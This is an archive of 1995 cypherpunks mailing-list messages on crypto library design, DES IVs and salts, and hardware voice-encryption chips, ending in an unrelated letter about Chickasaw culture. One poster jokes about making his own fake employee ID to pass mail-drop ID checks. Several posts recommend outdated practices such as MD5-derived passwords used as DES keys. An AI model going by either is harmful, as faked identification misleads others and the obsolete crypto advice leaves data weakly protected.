Tel: **181 858 0841  Fax: **171 834 2031  E-mail: cea01sig@gold.ac.uk

                    EDITOR OF FREE LIFE:  SEAN GABB
______________________________________________________________________

How to subscribe:  Send cheque for GBP10 or US$20 made out to the
                   Libertarian Alliance.
======================================================================
                 FOR LIFE, LIBERTY AND PROPERTY
======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip R. Moyer <prm@rome.isl.sri.com>
Date: Tue, 15 Aug 95 15:43:50 PDT
To: cypherpunks@toad.com
Subject: RC4 key search report
Message-ID: <9508152243.AA17885@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Are there any technical reports available describing the RC4 key search
efforts?  I am interested specifically in number of machines (compute
power) and time to completion.

Cheers,
Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 15 Aug 95 16:51:56 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: CoS Raid on "Copyright Terrorist"
Message-ID: <199508152000.QAA14285@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:17 PM 8/15/95 CDT, Mike McNally wrote:

>Mailboxes Etc. insists on getting a picture ID; at least they did last
>time I checked.  Some smaller mom&pop places will take a business card
>(time to break out your Jim Rockford Business Card Fabrication Kit).

I always supply picture ID these days.  It's really rough getting those cold
lamination-Employee ID kits from Office Depot, taking the polaroid on a blue
background, trimming the photo, and assembling the employment ID.  I'm one
of my best employees.

Don't forget to include your EMP_NO.  It gives the clerk something to write
down.

DCF

"Governments are simply not fully sovereign in the world of information;
their powers within it are strangely limited....This weakness of government
control within computer nets--a product of strongly protected privacy, a
lack of frontiers and confusions of jurisdiction--make them natural places
for subversion." -- The Economist "Softwar--A Survey of Defence Technology"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 15 Aug 95 07:30:11 PDT
To: cypherpunks@toad.com
Subject: Re: You are being monitored
In-Reply-To: <ac556f2801021004b2f7@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.950815161444.9279A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



> The manufacturer is apparently acting as the collection point, and any name
> can be put into the From: field.

Then, effectively, Quasar is a new(?) kind of remailer.
There was no got.net in the headers I could see. The
next question is how they log incoming agents.

Mats






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ray Cromwell" <s5cromw@watson.ibm.com>
Date: Tue, 15 Aug 95 13:51:27 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Object Oriented Crypto API
In-Reply-To: <199508031625.JAA11761@jobe.shell.portal.com>
Message-ID: <9508152050.AA21250@play.watson.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain



Sorry I took so long to respond.

Hal wrote:
> I enjoyed Ray's message about the crypto library interface.  I haven't
> had time to study it closely, but I have a couple of quick comments:
>
> I thought Wei's library looked pretty easy to use already.  Maybe Ray
> could show an example of what would be needed with Wei's library to do
> some "typical" crypto function, say encrypting a message with someone
> else's RSA key.  Then we could compare it with how the same function
> would look with Ray's proposed interface.

  Wei's library is easy to use from a certain standpoint. It depends
on a ASN.1 stream paradigm to stack cryptographic layers. However, I
think it is lacking in certain areas which makes it difficult
to use, and it is completely missing many functions such as
key distribution and management.

To RSA encrypt with Wei's library, you have to open the key file
(or read it into memory somehow), and instantiate a "BufferedTransformation"
which is a sort of internal stream library. Then you construct
a RSAPublicKey object around the BufferedTransformation, then you
generate a random blockcipher key, and tell the RSAPublicKey object
to encrypt it. Next, you encode your plaintext with the block cipher
separately using the blockcipher key. I'm going to ignore the
actual syntax of Wei's library for the moment (because I don't remember
it) and use pseudo code.

key_data_stream = FileSource("publickey.data") /* like ifstream() */
RSAPublicKey rsa_object(key_data_stream);
random_blockcipher_key = /* generate the key somehow, note, key generation
	                    is not standardized across all encryption
                            algorithms, so the application writer
                            must know how to generate the session key
                            manually */
rsa_object.Encrypt(random_blockcipher_key, encryptedkey);
DESEncryption desenc(random_blockcipher_key);
desenc.ProcessBlock(plaintext, ciphertext);
/* write "encryptedkey" and "ciphertext" somewhere */






Under my scheme, it would look something like this

/* we are given PlainText p, a KeyID which is of the format
   KeyID ::= identifier ['::' keyserver]
   identifier ::= RFC822_EMAIL_ADDR | HEX_STRING;
   keyserver ::= FULLY_QUALIFIED_DOMAIN_NAME;

   example: "Ray Cromwell" <rjc@clark.net>::keyserver.com
   we are doing RSA encryption with DES
*/

DESEncryptionAlgorithm des;
RSAEncryptionAlgorithm rsa(des);

Encrypt(rsa, KeyId, p, c);




Here's the explaination of what's going on underneath (refer to
my OO Crypto API article if needed)

DES is a BlockCipherEncryptionAlgorithm (child of EncryptionAlgorithm)
RSA is a PublicKeyEncryptionAlgorithm (also a child of EncryptionAlgorithm)
that expects to be constructed with a BlockCipherEncryptionAlgorithm
because it uses a blockcipher as the underlying encryption technique
and only encrypts the session key. Any old BlockCipherEncryptionAlgorithm
will do, DES, IDEA, etc. RSA doesn't care.

Encrypt() is a global function which takes as its first argument
an EncryptionAlgorithm, second, a KeyID, and third/fourth a plaintext
and ciphertext tokenized stream (to be explained later). Encrypt()
doesn't care what the cryptosystem is, it's a single entry point
for the application developer.

Encrypt's pseudocode looks like this

Encrypt(EncryptionAlgorithm encalg, KeyID kid, Plaintext p, Ciphertext c)
{
    KeyDomain kdom=encalg.GetKeyDomain(kid);
    EncryptionKey ek = GetKey(kdom, kid);
    encalg.encrypt(ek, p, c);
}

Line 1 asks the EncryptionAlgorithm (whatever type it really is), to
return a KeyDomain for that cryptosystem. A KeyDomain is an abstract
universal object for fetching any key type from any place. It could
for instance, be fetching the key from a disk file, from an email
signature, or am internet key server.

Line 2 calls a global key management function GetKey which queries
a KeyDomain with the KeyID to return an EncryptionKey.

Line 3 calls the encrypt function on the EncryptionAlgorithm.

I have toyed with other interfaces. For instance, since we want to
support the definition of new KeyDomain types, we really should allow
an overloaded Encrypt where the EncryptionKey is passed as an argument,
so that the application developer can use third party KeyDomains.

Every EncryptionAlgorithm (hereafter abbreviated EA, where DA is
a DecryptionAlgorithm) knows how to generate a KeyPair which
contains an encryption and decryption key such that
DA(keypair.decryption_key, EA(keypair.encryption_key, plaintext)) == plaintext
Whether the cipher is symmetric or not is irrevelent. The RSAEncryptionAlgorithm
encrypt() function basically calls generate_key() on the block cipher
and uses that as the session key. Application developers are shielded
from the representation of keys and the generation of them.


The real dream is to have a generic crypto library which can encrypt
anything using any algorithm fetching keys from any medium and
reading and writing any valid crypto file format. Application developers
could write code to operate on PGP file formats, RSAREF, PEM, or
anything without having to know anything about those formats at all.
The only thing that is standardized is the KeyID format. Sort of
a Universal Resource Name (URN) for key identification. Perhaps
"key://keyserver.domain/keyid" would be better.


Reading and Writing any file format
-----------------------------------
  How would an application be able to operate on a RIPEM message, and a
PGP file without knowing about the format of either?

  The general scheme is to use a tokenized stream which records
what has been done to the plaintext, and then some stream encoding
objects which "map" the stream to the local format as long as the
stream is consistent with the algorithms the file format supports. Think
of the stream as a string in a regular language (in the sense of automata
theory). The stream "mapper" is a deterministic finite automaton
which processes the "string" (the stream tokens) and determines
1) whether the string is acceptable by the language (file format)
it's mapping to, and 2) generates side effects which write out the
format to a buffer or file.

Consider the following symbol set,
S={ RSA_ENCRYPTION, PUBLICKEY_REF, DES_ENCRYPTION, IDEA_ENCRYPTION }

A tokenized stream might look like

RSA_ENCRYPTION PUBLICKEY_REF [pkey data] [encrypted session key]
DES_ENCRYPTION [ciphertext]

A PGPEncoder would reject this stream because it doesn't use IDEA.


Encoders would have the job of verifying consistency of the
stream with the underlying file format, and also whether or not
the stream was encoded properly in the first place. If the
stream is invalid, exceptions are thrown. If some tokens are
missing (such as a timestamp), the Encoder can supply them.

> The other point is that there needs to be the ability to encrypt only
> a bit of a message at a time.  Particularly with public key the first
> message may be special in that it generates a session key which is used
> for the remainder.  So an interface for piecewise encryption and
> decryption is necessary.

The way to do this is to provide secondary interfaces across all
Algorithms which allow the operations of Init, Update, and Finalize,
much like RSA's MD5 interface operates.

-Ray



From owner-cypherpunks  Tue Aug 15 15:06:28 1995



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt7508b@prism.gatech.edu (PHrEaK!)
Date: Tue, 15 Aug 95 15:06:28 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: Purple Boxes
In-Reply-To: <199508112044.NAA12959@netcom19.netcom.com>
Message-ID: <199508152206.SAA23244@acmex.gatech.edu>
MIME-Version: 1.0
Content-Type: text


> it would be called the "purple box" because I have not heard
> of any other devices called "purple boxes" (i.e. this string
> in the "colorful" hacker namespace does not seem to be used up yet)
> and also the famous WWII compromised japanese diplomatic codes 
> were called Purple.
This isn't very important, but there actually is a purple box, but
like many boxes hogging up "colorspace" this one isn't too exciting.
Its a telephone hold button... (woo woo) 
> one of the problems is that serious crypto chips are pretty
> expensive. but an analog scrambler would actually be a decent
> start on all this, and I bet it could be built pretty cheaply.
Does anyone know of sources for des chips???
Are there any public key chips out there???
Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
slow for realistic real time hardware voice/data encryption??)
I know a little about digital electronics (I am a computer engineering
student) and I would love to get some data books and see if I could
come up with a secure "encryption box" that people could build. 
Obviously such things are available from AT&T, etc... but they come at
a premium due to the fact that people who need such security normally
have the cash for it. I little public key encryption box that is 
arguably easy to construct and costs less than $50 in parts would
catch on fast in the hacker world. At that point, someone would go into
business selling the things, as compaines did with blue boxes (remmeber
how apple computers got started?) and red boxes (look in 2600 marketplace.)
Please anyone send me info on possible vendors/databooks and I will definately
look into this.

-- 
=-=-=-=-=-=-= Tom Cross AKA The White Ninja / Decius 6i5 */^\* -=-=-=-=-=-=-=-
-=-=-=-=-=- TWN615@mindvox.phantom.com  GT7508B@prism.gatech.edu =-=-=-=-=-=-=
=- "Government is not a reason, not an eloquence; it is a force. Like fire, =-
-=- it is a dangerous servant and a fearful master." -- George Washington -=-=



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Tue, 15 Aug 95 15:41:16 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Use of the IV in DES & stuffing the first block w/ random stuff
In-Reply-To: <199508152039.NAA15590@ix7.ix.netcom.com>
Message-ID: <SAA03523.199508152240@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508152039.NAA15590@ix7.ix.netcom.com>, Bill Stewart writes:
>At 09:52 AM 8/15/95 -0400, you wrote:
>>I have recently started writing a small pair of encription and
>>decription programs.  I was planning of gennerating the key by
>>taking the MD5 of the text password supplied by the user.
>
>A reasonable approach, but be careful in your implementation.
>I haven't seen the book "A Million Wimpy Passwords and their MD5s" yet,
>but the CD-ROM version may be out soon :-)  And you can probably
>ftp it from dockmaster.

I don't know what can be done here other then encuraging the user
to use a long password.

[...]
>IVs are designed to let you put random stuff in them to discourage
>known-plaintext attacks, replay attacks, etc.   However, suppose you
>take a known 64 bits from MD5(password) and put them in the IV -
>instead of the Bad Guy needing to brute-force 168-bit-deep Triple DES,
>he gets to brute force MD5s of human-selected passwords instead,
>which makes a lot of pre-computation possible.

Don't I need to know what goes into the IV?  I can't just stick
random stuff in it - I need to stick something that is a function
of the passphrase into it (or make the user remember something
my program spits out).

>Also, for 3-Key Triple-DES, how do you get 168 bits of key from
>128bits of MD5?  (for 2-Key 3-DES, you only need 112 bits...)
>If you do something like M1=MD5(Key), M2=MD5(M1,Key), realize 
>you've got at most 128 bits of real key instead of 168, 
>though that probably needn't worry you too much...

Oh, I was going to do a MD5 of half of the passphrase to get one
key pair, then MD5 the other half to get another key, and that
left about 64 bits to play with....

[...]
>>Or am I better off putting the extra 64 bits of "key" into the IV,
>>and generating a strong random number to stuff in the first block
>>- since the decoder can just ignore that block anyway.
>Put the strong random number in the IV, if you've _got_ a source
>of strong random numbers...

Don't I need to reproduce the same IV during the decryption?

>You might want to do something fancy like choose a random salt,
>use the salt for the IV, and use MD5(salt,human-selected-key) for the key.
>This makes pre-computation much less useful (unless you're careless
>and use MD5(key,salt) instead if MD5(salt,key)...), and means that
>you use a different session key for each batch of stuff you encrypt,
>even though you're using the same key.  If you're paranoid about replay
>attacks, you could let some of the bits of the salt be random and some 
>be a counter, and never accept a key smaller than the one from the
>previous successfully-decrypted message.

Hmmmm, so I should put the salt in the clear at the start of the file?
This looks like an intresting idea.

(it occurs to me that I never mentioned what my "sample application"
was - I was thinking of encryption backup tapes so they can safely
be transported off site and stored.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Tue, 15 Aug 95 15:49:49 PDT
To: gt7508b@prism.gatech.edu (PHrEaK!)
Subject: Re: Purple Boxes
In-Reply-To: <199508152206.SAA23244@acmex.gatech.edu>
Message-ID: <SAA03565.199508152249@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508152206.SAA23244@acmex.gatech.edu>, PHrEaK! writes:
[...]
>> one of the problems is that serious crypto chips are pretty
>> expensive. but an analog scrambler would actually be a decent
>> start on all this, and I bet it could be built pretty cheaply.
>Does anyone know of sources for des chips???

CEI makes a "Super Crypt Chip" that does single and tripple DES,
I beleve you can clock it at 25Mhz and get 32bits of cyphertext
out per cycle in single DES mode, it is somewhat slower (but not
three times slower) in tripple DES mode.  I beleve that's what
UUNET uses in their LanGuardian product.  I have the spec sheet in
a box somewhere if anyone needs the part number.   Definitly
more then fast enough to encrypt voice traffic.

>Are there any public key chips out there???

I think NEC makes one.  I know AT&T makes one.  DEC had some, but
they may not have been a comercial product.  Sorry I don't have part
numbers, and havn't read a spec sheet for any of them.

>Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
>slow for realistic real time hardware voice/data encryption??)

DEC had a chip in the lab that could RSA encrypt/decrypt at a rather
hiigh speed, unfortunitly I don't recall the speed - something like
a DS0's worth (or it may have as low as 32Kbits/sec worth) - less 
then a T1.

I have no doubt that there are some very fast hardware IDEA chips
(which is what I think you need to make go fast to get a hardware
PGPphone to go fast - well the codec as well)

>I know a little about digital electronics (I am a computer engineering
>student) and I would love to get some data books and see if I could
>come up with a secure "encryption box" that people could build. 
>Obviously such things are available from AT&T, etc... but they come at
>a premium due to the fact that people who need such security normally
>have the cash for it. I little public key encryption box that is 
>arguably easy to construct and costs less than $50 in parts would
>catch on fast in the hacker world. At that point, someone would go into
>business selling the things, as compaines did with blue boxes (remmeber
>how apple computers got started?) and red boxes (look in 2600 marketplace.)
>Please anyone send me info on possible vendors/databooks and I will definately
>look into this.

I'm afarid it won't be $50 worth of parts untill you start buying
thousands of chips at once.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Tue, 15 Aug 95 20:39:26 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: An article for Wired magazine
Message-ID: <8AF3490.0003000322.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PE> kilos of gold in it if $50,000 in cash doesn't suit your tastes. I
PE> defy governments to eliminate gold as well as paper currency.

  Um. Didn't FDR try that?


 * Free will made me do it!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 15 Aug 95 20:12:47 PDT
To: die@die.com
Subject: Re: Purple Boxes
Message-ID: <v02120d03ac571f5b265d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:30 8/15/95, Dave Emery wrote:

>        I'm quite convinced that with a fast microcontroller and
>especially a really fast DSP engine you can do both 3-DES and idea in
>the same hardware that does the rest.
[...]
>        I should think realistically there should be a lot of bandwidth
>left over for the voice compression - for the encryption you might
>possibly be talking 5% of the dsp cpu if you use a 50 mhz part.

I agree. You can easily do encryption and compression on the same chip.
There is no need for a separate DES/RSA chip. I only included some possible
DES chip manufactors, because the original poster asked for them.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 15 Aug 95 17:22:57 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <199508160020.UAA15367@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508152206.SAA23244@acmex.gatech.edu>,
gt7508b@prism.gatech.edu (PHrEaK!) wrote:

>Does anyone know of sources for des chips???
>Are there any public key chips out there???
>Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
>slow for realistic real time hardware voice/data encryption??)
>I know a little about digital electronics (I am a computer engineering
>student) and I would love to get some data books and see if I could
>come up with a secure "encryption box" that people could build.

I don't know off the top of my head who makes DES and RSA chips.  I am
sure there are many manufactors of DES chips. Try TI, National, and
Motorola. I belive that Schneier has a list of RSA chip makers.

For the DSP part of a "bump in the cord" encrytion box, you want to get
the "TI TMS320 Family Development Support" booklet by calling (800)
477-8924. You also want to look at Motorola's 68000 CPU, DSP, and
controller on one chip. I can't recall the exact product number. Just call
Motorola and ask for it.

Have fun,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDE5iSoZzwIn1bdtAQETkgGAjfPRJ09tGSauoSSWuaQiBqeVjI0sWXWH
vJ5Ft3efVPBaZTEMXh0Q4MOkH23ot3hS
=FJ9y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Aug 95 17:22:50 PDT
To: cypherpunks@toad.com
Subject: TYM_eup
Message-ID: <199508160022.UAA13728@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Time magazine of Augst 21 has a breathless cover story on
   cyber war, infowar and farside warriors, with a piece on a
   Rocky Horror Rand war game. Someone who knows the URL for
   Time articles may want to wave it.

   Or, for squeamish ossifragers who do not want to be IDed at 
the
   Time stakeout:


   TYM_eup (about 36kb in 2 parts)









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 15 Aug 95 17:29:30 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <199508160026.UAA15442@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508152206.SAA23244@acmex.gatech.edu>,
gt7508b@prism.gatech.edu (PHrEaK!) wrote:

>Does anyone know of sources for des chips???
>Are there any public key chips out there???
>Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
>slow for realistic real time hardware voice/data encryption??)
>I know a little about digital electronics (I am a computer engineering
>student) and I would love to get some data books and see if I could
>come up with a secure "encryption box" that people could build.

I don't know off the top of my head who makes DES and RSA chips.  I am
sure there are many manufactors of DES chips. Try TI, National, and
Motorola. I belive that Schneier has a list of RSA chip makers.

For the DSP part of a "bump in the cord" encrytion box, you want to get
the "TI TMS320 Family Development Support" booklet by calling (800)
477-8924. You also want to look at Motorola's 68000 CPU, DSP, and
controller on one chip. I can't recall the exact product number. Just call
Motorola and ask for it.

Have fun,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDE67ioZzwIn1bdtAQGdwQF+MnhFo72hoxjAzESO/MksNE1QKNys35Tp
zJZJxng6FOxikLO01FjmKR32A47Pq7cK
=in6Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 15 Aug 95 17:31:31 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <199508160028.UAA15477@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <SAA03565.199508152249@garotte.va.pubnix.com>,
stripes@va.pubnix.com ("Josh M. Osborne") wrote:


>I'm afarid it won't be $50 worth of parts untill you start buying
>thousands of chips at once.

For a single device, count on spending ~$400 for hardware.  In large
volumes, you should be able to go below $150.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDE7oCoZzwIn1bdtAQFxAAF/YIJPuO5siDuspQhDGf6u+nks1lXfjCj9
z/NZFxQkVsDVv/GvQnPdPKYYr144eVuE
=57Vm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Poldre <jp@jep.pld.ttu.ee>
Date: Tue, 15 Aug 95 10:56:14 PDT
To: John Young <jya@pipeline.com>
Subject: CAT_tal
In-Reply-To: <199508151232.IAA25456@pipe4.nyc.pipeline.com>
Message-ID: <Pine.3.07.9508152055.B12204-5100000@jep.pld.ttu.ee>
MIME-Version: 1.0
Content-Type: text/plain


 CAT_tal (about 15kb) 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 15 Aug 95 20:50:56 PDT
To: cypherpunks@toad.com
Subject: Purple Boxes vs. Native Signal Processing
Message-ID: <ac56b476090210042171@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:12 AM 8/16/95, Lucky Green wrote:

>I agree. You can easily do encryption and compression on the same chip.
>There is no need for a separate DES/RSA chip. I only included some possible
>DES chip manufactors, because the original poster asked for them.

The trend is away from having two chips when one will suffice. Thus, the
Macintosh 840av and 660av had a Motorola 68040 _and_ a Motorola 56000 DSP
chip for speech processing and recognition, sound processing, etc....they
were dropped and replaced by the PowerPC machines, which dispensed with the
separate DSP chips. (The DSPs were never fully supported by software,
especially from third party vendors....)

And Intel is pushing "native signal processing," wherein DSP functions are
pushed back into the CPU. If the CPU is fast enough, as the fast Pentiums
are, this can work. This may be partly to sell more and faster Pentiums and
partly because Intel has no effective DSP products at this time.

(Intel has generally missed out on the DSP market, despite arguably having
invented the first DSP chip. In 1977 I worked on the Intel 2920 signal
processor, the first general purpose chip to do signal processing. Invented
by Ted Hoff, the same guy who invented the microprocessor, it was abandoned
a few years later. Then came the success of TI's TMS320 (or similar) DSP
chips, the Motorola 56000 series, and Intel was out of the game.)

Pushing DSP functions into the CPU can be taken too far. Apple, for
example, had/has a "Geo Modem," or something like this, which does modem
funtions in the CPU of some machines. Last I heard it was stuck at being
too slow, with no software updates, and effectively is being abandoned.
Modems have gotten so cheap that using the CPU makes little sense if it
also complicates software.

As in everything, the choice in partitioning is crucial.

Of relevance to this list, I see no hope whatsoever that people will buy
gizmos to do encryption if a software-only ("native signal processing")
solution is within a factor of several in performance. After all, people
complain that RSADSI wants "exorbitant" prices ($125) for public key
ecryption and demand that "free" products are needed, so I can't see them
spending $300 or even $100 for a hardware solution that does encryption a
bit faster.

If the Pentium + Soundblaster can do VoicePGP or PGPFone or Nautilus, then
what's the incentive to buy additional hardware? Last I heard about CELP,
it could handle "Pretty Good Voice" on a mere 66 MHz 486, and that's about
2-4x slower than what people are routinely buying today.

(The situation may be slightly different for a fully-productized and
consumerized "bump in the wire" secure phones, where the finished product
will be sold to a different sort of customer than those clamoring for cheap
crypto.)

In conclusion, I'd always look to a software solution first. Anything that
requires chips is automatically harder to build and to sell.

Most importantly, a solution which runs on standard hardware available
around the world will be trivially exportable (technologically) and will
spread within days of availability, whereas a hardware-dependent solution
will likely remain obscure and hard to export. Sofware solutions rule!

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Tue, 15 Aug 95 19:47:54 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Purple Boxes
In-Reply-To: <199508160020.UAA15367@bb.hks.net>
Message-ID: <9508160230.AA01456@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


 Lucky Green writes :
> 
> In article <199508152206.SAA23244@acmex.gatech.edu>,
> gt7508b@prism.gatech.edu (PHrEaK!) wrote:
> 
> >Does anyone know of sources for des chips???
> >Are there any public key chips out there???
> >Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
> >slow for realistic real time hardware voice/data encryption??)
> >I know a little about digital electronics (I am a computer engineering
> >student) and I would love to get some data books and see if I could
> >come up with a secure "encryption box" that people could build.
> 
> I don't know off the top of my head who makes DES and RSA chips.  I am
> sure there are many manufactors of DES chips. Try TI, National, and
> Motorola. I belive that Schneier has a list of RSA chip makers.
> 
	I'm quite convinced that with a fast microcontroller and
especially a really fast DSP engine you can do both 3-DES and idea in
the same hardware that does the rest.  You need only to encrypt
somewhere between 9.6 kbits and 16 kbits per second or between 1 and 2
kbytes/sec or 125 to 250 block encryptions per second which is lots less
than 100+ kbytes/second people have been getting for DES file encryption
on high end PC class processors.  And a good DSP core carefully
programmed is probably quite comparable to the performance of a DX-4 or
mid range Pentium on algorithms such as DES, idea or even RC4. 

	I should think realistically there should be a lot of bandwidth
left over for the voice compression - for the encryption you might
possibly be talking 5% of the dsp cpu if you use a 50 mhz part.

	And while RSA is nice, it has usually been confined to key
exchange because it so slow.   There are hardware versions of RSA
that will work at modem speeds or better with reasonable moduluses
but this is specialized VLSI hardware and as far as I have ever noticed
is not available cheaply as is the kind of DSP used for V.34 modems.
And certainly doing key exchange RSA on a dsp or 32 bit microcontroller
is reasonable if it only adds a second or two of call setup.

> For the DSP part of a "bump in the cord" encrytion box, you want to get
> the "TI TMS320 Family Development Support" booklet by calling (800)
> 477-8924. You also want to look at Motorola's 68000 CPU, DSP, and
> controller on one chip. I can't recall the exact product number. Just call
> Motorola and ask for it.
> 

	I reiterate my suggestion of a few months ago that
one could quite easily adapt the firmware on one of the new simultanious
data and digital voice on the same phone line modems to incorperate
encryption, and quite possibly encryption/key exhange interoperable
with some mode of PGPphone.   Doing this would relieve one of the
need to develop or manufacture any hardware at all - all that would
be required to have a portable "bump in the cord" encrypter widely
available for a low price would be creating a new version of the
downloadable flash ROM image that did encryption and PGPphone
key exchange.

						Dave Emery

						die@die.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@piermont.com
Date: Tue, 15 Aug 95 20:41:58 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
In-Reply-To: <9508160230.AA01456@pig.die.com>
Message-ID: <199508160341.XAA16498@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Dave Emery" writes:
> 	I reiterate my suggestion of a few months ago that
> one could quite easily adapt the firmware on one of the new simultanious
> data and digital voice on the same phone line modems to incorperate
> encryption, and quite possibly encryption/key exhange interoperable
> with some mode of PGPphone.

Does Rockwell sell voice/data modem chipsets?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ranxerox@ajsbbs.com
Date: Wed, 16 Aug 95 00:18:25 PDT
To: Anne.Stordiau@ping.be
Subject: next letter...
Message-ID: <199508160718.AAA10488@eskinews.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> Pl. teach me about american indians ?
 
What would you like to know...  I'll answer any questions that I can, and
research any that I can't.
 
> From Canada or a US state ?
 
Well, the Chickasaw tribe is originally from the Southeastern US (Alabama,
Kentucky, etc.)  The name (in the native language) means 'Unconquered and
Unconquerable'  During that time, the Chickasaws were mainly
farmers/traders.  But if someone made them mad, they NEVER forgot or forgave
until the debt was settled.
 
Early in the war between the French and English, the English hired the
Chickasaw people to fight for them.  The French didn't stand a chance after
that because of the Chickasaw and their allies.  (When the Chickasaw were
hired, they also asked other tribes to help in the war.)
 
The Chickasaw's real name is spelled Chikasha (chi-KAH-shuh).
 
My 'indian name' is: "Akuckma Kallo Hin-li Nita ho atuk Nutackhish".  (It
means 'Bad-tempered standing bear, he that has a beard.')  And since I am
1.9 - 2m tall and weigh about 150Kg, it kind of fits...  #:^)
 
> I made a blizz trip to California and, when staying at the Canyon's, I had
> the opportunity to visit Indian reserves but didn't want to - don't ask me
> why.  I'm a little disturbed by these "come-and-see-me" touristic
> roundtrips.  Although I saw a lot in a very very short time, I felt
> uncomfortable about looking at "people" as part of the trip.  Stupid?
 
As long as you treat the people with respect and dignity, what is to
be ashamed of?  These displays are done to educate people.  To let them
know more about the tribe, it's culture and it's history.
 
As long as you keep in mind the idea that it's there to teach, there's
nothing at all wrong with it.
 
There are some ceremonies that aren't done for show.  Like (for example)
the Cheyanne (shy-ANN) Sun Ceremony.  This is a VERY serious thing.  It
lasts for 4 days (4 is an important number).
 
During this ceremony, sacrifices are made.  You can sacrifice some of your
flesh by cutting it off of your own body, or you can sacrifice pain.  If
